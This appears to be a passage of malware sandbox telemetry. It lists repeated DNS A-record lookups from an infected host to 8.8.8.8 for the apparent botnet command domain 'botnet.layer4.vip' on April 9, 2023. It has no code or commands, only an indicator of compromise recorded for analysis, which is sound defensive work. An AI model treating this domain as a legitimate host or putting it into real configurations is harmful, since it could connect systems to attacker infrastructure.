                                  Apr 9, 2023 03:30:38.712718964 CEST192.168.2.238.8.8.80x176eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.728394985 CEST192.168.2.238.8.8.80x176eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.753011942 CEST192.168.2.238.8.8.80x176eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.777354956 CEST192.168.2.238.8.8.80x176eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.802212954 CEST192.168.2.238.8.8.80x296Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.818064928 CEST192.168.2.238.8.8.80x296Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.833816051 CEST192.168.2.238.8.8.80x296Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.858299971 CEST192.168.2.238.8.8.80x296Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.882385015 CEST192.168.2.238.8.8.80x296Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.897933960 CEST192.168.2.238.8.8.80x723dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.922059059 CEST192.168.2.238.8.8.80x723dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.937712908 CEST192.168.2.238.8.8.80x723dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.953296900 CEST192.168.2.238.8.8.80x723dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.977761984 CEST192.168.2.238.8.8.80x723dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.994127035 CEST192.168.2.238.8.8.80x2056Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.010359049 CEST192.168.2.238.8.8.80x2056Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.026751041 CEST192.168.2.238.8.8.80x2056Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.051467896 CEST192.168.2.238.8.8.80x2056Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.066979885 CEST192.168.2.238.8.8.80x2056Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.091187000 CEST192.168.2.238.8.8.80x952Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.107003927 CEST192.168.2.238.8.8.80x952Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.123016119 CEST192.168.2.238.8.8.80x952Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.139055014 CEST192.168.2.238.8.8.80x952Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.154737949 CEST192.168.2.238.8.8.80x952Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.179053068 CEST192.168.2.238.8.8.80xb3dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.204437971 CEST192.168.2.238.8.8.80xb3dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.220470905 CEST192.168.2.238.8.8.80xb3dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.244967937 CEST192.168.2.238.8.8.80xb3dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.270087957 CEST192.168.2.238.8.8.80xb3dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.286854029 CEST192.168.2.238.8.8.80xdc45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.302540064 CEST192.168.2.238.8.8.80xdc45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.318226099 CEST192.168.2.238.8.8.80xdc45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.342448950 CEST192.168.2.238.8.8.80xdc45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.358714104 CEST192.168.2.238.8.8.80xdc45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.375927925 CEST192.168.2.238.8.8.80x3e39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.391556025 CEST192.168.2.238.8.8.80x3e39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.416301012 CEST192.168.2.238.8.8.80x3e39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.431929111 CEST192.168.2.238.8.8.80x3e39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.457293034 CEST192.168.2.238.8.8.80x3e39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.473422050 CEST192.168.2.238.8.8.80x9825Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.489507914 CEST192.168.2.238.8.8.80x9825Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.514091969 CEST192.168.2.238.8.8.80x9825Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.538717985 CEST192.168.2.238.8.8.80x9825Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.554821014 CEST192.168.2.238.8.8.80x9825Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.571742058 CEST192.168.2.238.8.8.80x51d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.589920044 CEST192.168.2.238.8.8.80x51d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.605977058 CEST192.168.2.238.8.8.80x51d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.630780935 CEST192.168.2.238.8.8.80x51d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.646626949 CEST192.168.2.238.8.8.80x51d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.663197041 CEST192.168.2.238.8.8.80x2197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.678922892 CEST192.168.2.238.8.8.80x2197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.710016966 CEST192.168.2.238.8.8.80x2197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.726262093 CEST192.168.2.238.8.8.80x2197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.750827074 CEST192.168.2.238.8.8.80x2197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.778789997 CEST192.168.2.238.8.8.80x2fffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.803430080 CEST192.168.2.238.8.8.80x2fffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.828114986 CEST192.168.2.238.8.8.80x2fffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.844964027 CEST192.168.2.238.8.8.80x2fffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.861596107 CEST192.168.2.238.8.8.80x2fffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.886007071 CEST192.168.2.238.8.8.80x558eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.902077913 CEST192.168.2.238.8.8.80x558eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.926826954 CEST192.168.2.238.8.8.80x558eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.943222046 CEST192.168.2.238.8.8.80x558eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.967715979 CEST192.168.2.238.8.8.80x558eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.984194040 CEST192.168.2.238.8.8.80x8b69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.999789953 CEST192.168.2.238.8.8.80x8b69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.015701056 CEST192.168.2.238.8.8.80x8b69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.039992094 CEST192.168.2.238.8.8.80x8b69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.064474106 CEST192.168.2.238.8.8.80x8b69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.080411911 CEST192.168.2.238.8.8.80x84f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.104760885 CEST192.168.2.238.8.8.80x84f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.128930092 CEST192.168.2.238.8.8.80x84f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.153409958 CEST192.168.2.238.8.8.80x84f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.169244051 CEST192.168.2.238.8.8.80x84f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.193895102 CEST192.168.2.238.8.8.80x34fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.209920883 CEST192.168.2.238.8.8.80x34fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.225620031 CEST192.168.2.238.8.8.80x34fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.241267920 CEST192.168.2.238.8.8.80x34fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.265716076 CEST192.168.2.238.8.8.80x34fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.281315088 CEST192.168.2.238.8.8.80x59a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.305525064 CEST192.168.2.238.8.8.80x59a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.329735041 CEST192.168.2.238.8.8.80x59a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.353877068 CEST192.168.2.238.8.8.80x59a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.369777918 CEST192.168.2.238.8.8.80x59a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.385797977 CEST192.168.2.238.8.8.80x78beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.401917934 CEST192.168.2.238.8.8.80x78beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.426455021 CEST192.168.2.238.8.8.80x78beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.450613976 CEST192.168.2.238.8.8.80x78beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.466475010 CEST192.168.2.238.8.8.80x78beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.490756035 CEST192.168.2.238.8.8.80x3a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.506306887 CEST192.168.2.238.8.8.80x3a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.522181034 CEST192.168.2.238.8.8.80x3a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.546317101 CEST192.168.2.238.8.8.80x3a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.570785999 CEST192.168.2.238.8.8.80x3a75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.595362902 CEST192.168.2.238.8.8.80x55daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.619467020 CEST192.168.2.238.8.8.80x55daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.643707037 CEST192.168.2.238.8.8.80x55daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.659709930 CEST192.168.2.238.8.8.80x55daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.684005976 CEST192.168.2.238.8.8.80x55daStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.712789059 CEST192.168.2.238.8.8.80xcdb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.728854895 CEST192.168.2.238.8.8.80xcdb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.753071070 CEST192.168.2.238.8.8.80xcdb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.777570963 CEST192.168.2.238.8.8.80xcdb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.793677092 CEST192.168.2.238.8.8.80xcdb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.818094969 CEST192.168.2.238.8.8.80xf6d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.842765093 CEST192.168.2.238.8.8.80xf6d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.858763933 CEST192.168.2.238.8.8.80xf6d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.874950886 CEST192.168.2.238.8.8.80xf6d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.890856981 CEST192.168.2.238.8.8.80xf6d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.907618046 CEST192.168.2.238.8.8.80x2ad0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.923326015 CEST192.168.2.238.8.8.80x2ad0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.939049959 CEST192.168.2.238.8.8.80x2ad0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.954674006 CEST192.168.2.238.8.8.80x2ad0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.970309019 CEST192.168.2.238.8.8.80x2ad0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.994848967 CEST192.168.2.238.8.8.80x2b1dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.010927916 CEST192.168.2.238.8.8.80x2b1dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.035146952 CEST192.168.2.238.8.8.80x2b1dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.059817076 CEST192.168.2.238.8.8.80x2b1dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.075794935 CEST192.168.2.238.8.8.80x2b1dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.100375891 CEST192.168.2.238.8.8.80x79f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.124798059 CEST192.168.2.238.8.8.80x79f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.140738010 CEST192.168.2.238.8.8.80x79f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.164973021 CEST192.168.2.238.8.8.80x79f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.180512905 CEST192.168.2.238.8.8.80x79f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.205276012 CEST192.168.2.238.8.8.80x7ce0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.229727983 CEST192.168.2.238.8.8.80x7ce0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.245488882 CEST192.168.2.238.8.8.80x7ce0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.270221949 CEST192.168.2.238.8.8.80x7ce0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.286346912 CEST192.168.2.238.8.8.80x7ce0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.302242994 CEST192.168.2.238.8.8.80x3fa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.326675892 CEST192.168.2.238.8.8.80x3fa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.342509985 CEST192.168.2.238.8.8.80x3fa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.367173910 CEST192.168.2.238.8.8.80x3fa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.382967949 CEST192.168.2.238.8.8.80x3fa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.407433987 CEST192.168.2.238.8.8.80xb072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.431735039 CEST192.168.2.238.8.8.80xb072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.447391033 CEST192.168.2.238.8.8.80xb072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.471760988 CEST192.168.2.238.8.8.80xb072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.496018887 CEST192.168.2.238.8.8.80xb072Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.512049913 CEST192.168.2.238.8.8.80xd1d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.528053999 CEST192.168.2.238.8.8.80xd1d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.543731928 CEST192.168.2.238.8.8.80xd1d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.559514999 CEST192.168.2.238.8.8.80xd1d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.584014893 CEST192.168.2.238.8.8.80xd1d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.600112915 CEST192.168.2.238.8.8.80x8266Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.616039991 CEST192.168.2.238.8.8.80x8266Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.631616116 CEST192.168.2.238.8.8.80x8266Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.656071901 CEST192.168.2.238.8.8.80x8266Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.671888113 CEST192.168.2.238.8.8.80x8266Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.713949919 CEST192.168.2.238.8.8.80x8f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.738720894 CEST192.168.2.238.8.8.80x8f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.763370991 CEST192.168.2.238.8.8.80x8f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.779192924 CEST192.168.2.238.8.8.80x8f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.803442955 CEST192.168.2.238.8.8.80x8f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.819947958 CEST192.168.2.238.8.8.80xff38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.844191074 CEST192.168.2.238.8.8.80xff38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.859699965 CEST192.168.2.238.8.8.80xff38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.883816004 CEST192.168.2.238.8.8.80xff38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.899324894 CEST192.168.2.238.8.8.80xff38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.914747000 CEST192.168.2.238.8.8.80xc2bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.938728094 CEST192.168.2.238.8.8.80xc2bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.954358101 CEST192.168.2.238.8.8.80xc2bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.970241070 CEST192.168.2.238.8.8.80xc2bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.986079931 CEST192.168.2.238.8.8.80xc2bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.001763105 CEST192.168.2.238.8.8.80xf4e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.025965929 CEST192.168.2.238.8.8.80xf4e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.050410032 CEST192.168.2.238.8.8.80xf4e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.066256046 CEST192.168.2.238.8.8.80xf4e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.090825081 CEST192.168.2.238.8.8.80xf4e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.115565062 CEST192.168.2.238.8.8.80x5438Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.140147924 CEST192.168.2.238.8.8.80x5438Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.155857086 CEST192.168.2.238.8.8.80x5438Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.180543900 CEST192.168.2.238.8.8.80x5438Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.204902887 CEST192.168.2.238.8.8.80x5438Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.221062899 CEST192.168.2.238.8.8.80xbef2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.236991882 CEST192.168.2.238.8.8.80xbef2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.261240005 CEST192.168.2.238.8.8.80xbef2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.276796103 CEST192.168.2.238.8.8.80xbef2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.300983906 CEST192.168.2.238.8.8.80xbef2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.317059994 CEST192.168.2.238.8.8.80xaa56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.341228008 CEST192.168.2.238.8.8.80xaa56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.357372999 CEST192.168.2.238.8.8.80xaa56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.382009983 CEST192.168.2.238.8.8.80xaa56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.406572104 CEST192.168.2.238.8.8.80xaa56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.430994034 CEST192.168.2.238.8.8.80x5a2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.447048903 CEST192.168.2.238.8.8.80x5a2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.462677956 CEST192.168.2.238.8.8.80x5a2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.487214088 CEST192.168.2.238.8.8.80x5a2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.511310101 CEST192.168.2.238.8.8.80x5a2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.535685062 CEST192.168.2.238.8.8.80xbac7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.551548958 CEST192.168.2.238.8.8.80xbac7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.567107916 CEST192.168.2.238.8.8.80xbac7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.582560062 CEST192.168.2.238.8.8.80xbac7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.606703043 CEST192.168.2.238.8.8.80xbac7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.622484922 CEST192.168.2.238.8.8.80x539fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.638155937 CEST192.168.2.238.8.8.80x539fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.662662983 CEST192.168.2.238.8.8.80x539fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
